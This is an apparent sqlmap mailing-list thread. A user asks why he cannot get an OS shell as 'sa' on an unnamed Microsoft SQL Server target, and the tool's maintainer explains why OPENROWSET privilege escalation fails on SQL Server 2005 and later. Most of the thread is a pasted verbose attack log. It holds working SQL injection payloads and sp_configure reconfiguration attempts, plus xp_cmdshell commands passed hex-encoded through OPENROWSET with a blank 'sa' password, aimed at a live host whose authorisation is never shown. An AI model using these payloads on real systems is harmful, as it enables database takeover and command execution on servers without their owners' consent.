Hi Daniel,
There's no need to provide the --sql-file, sqlmap will use the file
itself as part of the internal logic when --dbms-cred is provided.
However, OPENROWSET on Microsoft SQL Server 2005+ by default is not
executable by non DBA users or users that haven't been specifically
granted permission to that builtin function so it is unlikely that the
unprivileged session user will be able to execute it.
I see what you're trying to do, but vertical privilege escalation to
DBA via OPENROWSET works with default settings on Microsoft SQL Server
2000 and previous versions only.
According to the parsed DBMS error messages, the session user indeed
is no DBA hence no command execution.
Bernardo
On 21 March 2014 08:09, Daniel Shapira <donatekikor...@gmail.com> wrote:
> hey,
> i am trying to write on mssql with either os-shell or any other flag (non
> works for me)
> i know that 'Ad Hoc Distributed Queries are disabled -> OpenRowSet is
> disabled as well
> sqlmap initially gets into the db as a secondary user, there are 2 users in
> the db, SA which is the administrator and the other user which sqlmap gets
> at start
> the password for sa is NULL - no password at all, i know that by executing
> --users --passwords
> so with all this data i am trying to run:
> sqlmap -u "target" --risk=5 --level=5 --random-agent --threads=10 -o
> --os-shell --dbms-cred=sa: --fresh-queries -v3 --parse-errors -t traffic.txt
> --sql-file=/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql
> i also tried without the sql-file as i guess sqlmap should try it by itself
> but i get the same results
> so my guess is the sqlmap can't get into the 'sa' user because if it could
> get in, it would enable the openrowset. am i right?
> i can send the traffic.txt privately
> **********************
>
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: keyword
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: keyword=f') AND 1202=1202 AND ('NhGb' LIKE 'NhGb
> Vector: AND [INFERENCE]
>
> Type: error-based
> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
> clause
> Payload: keyword=f') AND 7343=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
> (7343=7343) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('PGJx' LIKE
> 'PGJx
> Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
> '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
>
> Type: stacked queries
> Title: Microsoft SQL Server/Sybase stacked queries
> Payload: keyword=f'); WAITFOR DELAY '0:0:5'--
> Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>
> Type: AND/OR time-based blind
> Title: Microsoft SQL Server/Sybase time-based blind
> Payload: keyword=f') WAITFOR DELAY '0:0:5'--
> Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
> ---
> [03:57:43] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2008 R2 or 7
> web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
> back-end DBMS: Microsoft SQL Server 2008
> [03:57:43] [INFO] executing SQL statements from given file(s)
> [03:57:43] [ERROR] unresolved variable 'ENABLE' in SQL file
> '/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql'
> do you want to provide the substitution values? [y/N] y
> insert value for variable 'ENABLE': 1
> [03:57:46] [DEBUG] executing SQL data execution query: 'EXEC
> master..sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
> EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH
> OVERRIDE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE WITH
> OVERRIDE'
> [03:57:46] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
> 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
> Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
> options', 0; RECONFIGURE WITH OVERRIDE--
> [03:57:46] [WARNING] time-based comparison requires larger statistical
> model, please wait..............................
> [03:57:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:57:53] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:57:53] [DEBUG] done
> EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE WITH
> OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1;
> RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
> RECONFIGURE WITH OVERRIDE: 'NULL'
> [03:57:53] [DEBUG] going to use D:/Microsoft SQL
> Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log as temporary files directory
> on Microsoft SQL Server 2005 and 2008, OPENROWSET function is disabled by
> default. This function is needed to execute statements as another DBMS user
> since you provided the option '--dbms-creds'. If you are DBA, you can enable
> it. Do you want to enable it? [Y/n] Y
> [03:59:06] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
> 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
> Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
> options', 0; RECONFIGURE WITH OVERRIDE--
> [03:59:06] [WARNING] it is very important not to stress the network adapter
> during usage of time-based payloads to prevent potential errors
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:06] [INFO] testing if current user is DBA
> [03:59:06] [PAYLOAD] f') AND 7808=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
> (IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1)
> THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('FSjT' LIKE
> 'FSjT
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: Conversion failed when converting the
> varchar value 'qsgjq0qywuq' to data type int.'
> [03:59:06] [DEBUG] performed 1 queries in 0.13 seconds
> [03:59:06] [WARNING] functionality requested probably does not work because
> the curent session user is not a database administrator
> [03:59:06] [DEBUG] creating a support table to write commands standard
> output to
> [03:59:06] [PAYLOAD] f');DROP TABLE sqlmapoutput--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:06] [PAYLOAD] f');CREATE TABLE sqlmapoutput(id INT PRIMARY KEY
> IDENTITY, data NVARCHAR(4000))--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:06] [INFO] testing if xp_cmdshell extended procedure is usable
> [03:59:06] [PAYLOAD] f');SELECT * FROM
> OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @ktdg
> VARCHAR(8000);SET
> @ktdg=0x6563686f2031203e2022443a2f4d6963726f736f66742053514c205365727665722f4d5353514c31305f35302e4d5353514c5345525645522f4d5353514c2f4c6f672f746d70636f6974652e74787422;EXEC
> master..xp_cmdshell @ktdg')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
> 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
> because this component is turned off as part of the security configuration
> for this server. A system administrator can enable the use of 'Ad Hoc
> Distributed Queries' by using sp_configure. For more information about
> enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
> SQL Server Books Online.'
> [03:59:06] [PAYLOAD] f');BULK INSERT sqlmapoutput FROM 'D:/Microsoft SQL
> Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpcoite.txt' WITH (CODEPAGE='RAW',
> FIELDTERMINATOR='WaPrHIHUBH', ROWTERMINATOR='vOTmRkjwAa')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: You do not have permission to use the
> bulk load statement.'
> [03:59:06] [PAYLOAD] f');SELECT * FROM
> OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @wgiw
> VARCHAR(8000);SET
> @wgiw=0x64656c202f46202f5120443a5c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70636f6974652e747874;EXEC
> master..xp_cmdshell @wgiw')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
> 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
> because this component is turned off as part of the security configuration
> for this server. A system administrator can enable the use of 'Ad Hoc
> Distributed Queries' by using sp_configure. For more information about
> enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
> SQL Server Books Online.'
> [03:59:07] [PAYLOAD] f') AND 9097=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT
> ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM
> sqlmapoutput)+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND
> ('tzMl' LIKE 'tzMl
> [03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: Conversion failed when converting the
> nvarchar value 'qsgjq0qywuq' to data type int.'
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>54 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>56 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>57 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [INFO] retrieved:
> [03:59:07] [DEBUG] performed 4 queries in 0.38 seconds
> [03:59:07] [WARNING] multi-threading is considered unsafe in time-based data
> retrieval. Going to switch it off automatically
> [03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51) WAITFOR DELAY
> '0:0:5'--
> [03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>48) WAITFOR DELAY
> '0:0:5'--
> [03:59:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:08] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:08] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>1) WAITFOR DELAY
> '0:0:5'--
> [03:59:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:13] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> do you want sqlmap to try to optimize value(s) for DBMS delay responses
> (option '--time-sec')? [Y/n] y
> [04:00:34] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>47) WAITFOR DELAY
> '0:0:5'--
> [04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:39] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))!=48) WAITFOR DELAY
> '0:0:5'--
> [04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:39] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>51) WAITFOR DELAY
> '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>48) WAITFOR DELAY
> '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>1) WAITFOR DELAY
> '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [INFO] retrieved: 0
> [04:00:40] [DEBUG] performed 8 queries in 92.65 seconds
> [04:00:40] [PAYLOAD] f');DELETE FROM sqlmapoutput--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [ERROR] it seems that the temporary directory ('D:/Microsoft SQL
> Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log') used for storing console output
> within the back-end file system does not have writing permissions for the
> DBMS process. You are advised to manually adjust it with option --tmp-path
> switch or you will not be able to retrieve the commands output
> [04:00:40] [INFO] going to use xp_cmdshell extended procedure for operating
> system command execution
> [04:00:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and
> press ENTER
> os-shell> x
>
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and their
> applications. Written by three acclaimed leaders in the field,
> this first edition is now available. Download your free book today!
> http://p.sf.net/sfu/13534_NeoTech
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
------------------------------------------------------------------------------
Learn Graph Databases - Download FREE O'Reilly Book
"Graph Databases" is the definitive new guide to graph databases and their
applications. Written by three acclaimed leaders in the field,
this first edition is now available. Download your free book today!
http://p.sf.net/sfu/13534_NeoTech
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
